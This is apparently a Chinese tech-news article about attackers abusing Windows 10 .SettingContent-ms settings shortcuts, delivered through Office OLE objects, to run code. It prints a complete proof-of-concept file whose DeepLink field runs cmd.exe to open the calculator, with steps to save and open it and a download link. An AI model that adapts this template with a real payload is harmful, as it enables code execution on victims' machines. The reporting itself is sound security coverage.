日前有研究人员发现部分地下技术社区流传着通过Windows 10设置应用配置文件下载执行恶意文件的示例。
该配置文件似乎引起不少研究人员和黑客的注意,因为在某些条件下可以用其下载远程文件甚至直接执行等。
该攻击策略主要依靠设置应用程序的SettingContent-ms快捷方式,当用户加载该文件可自动打开设置程序。
通过Microsoft Office组件加载恶意文件:
有研究人员发现通过直接加载配置文件的情况下还无法直接执行恶意代码,但仍可以通过其他途径完成操作。
这里又得再次提Microsoft Office OLE 组件,该组件在最近几年里已经被发现较多漏洞并且已经被黑客利用。
这次的攻击策略同样是利用 Microsoft Office OLE 组件的特性(不是漏洞)来弹出提示提醒用户点击确认按钮。
当然如果用户点击确认打开的话,恶意脚本就可以在后台自动下载可执行文件甚至是其他类型的恶意代码等。
示例代码:
下列代码复制粘贴到文本中再将文本后缀改为.SettingContent-ms再打开,没有提示的情况下会打开计算器。
直接下载研究人员制作好的示例代码测试:https://dl.lancdn.com/landian/Script/test.SettingContent-ms
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
<ApplicationInformation>
<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
<DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
<Icon>%windir%\system32\control.exe</Icon>
</ApplicationInformation>
<SettingIdentity>
<PageID></PageID>
<HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
</SettingIdentity>
<SettingInformation>
<Description>@shell32.dll,-4161</Description>
<Keywords>@shell32.dll,-4161</Keywords>
</SettingInformation>
</SearchableContent>
</PCSettings>
越来越多的黑客参与测试试图将其武器化:
目前研究人员扫描到越来越多的基于此类文件的脚本,黑客们试图将此类文件制作成可利用的脚本用于攻击。
但通过Microsoft Office OLE组件完成攻击的话最终需要用户确认,即用户必须点击打开按钮才可完成攻击。
目前尚未发现有黑客通过其他方式直接完成远程文件的下载与执行,不知道后续黑客会不会获得突破性进展。
当然既然现在事情已经发生按理说微软应该会进行干预,如在Microsoft Office OLE中对调用方式进行调整。
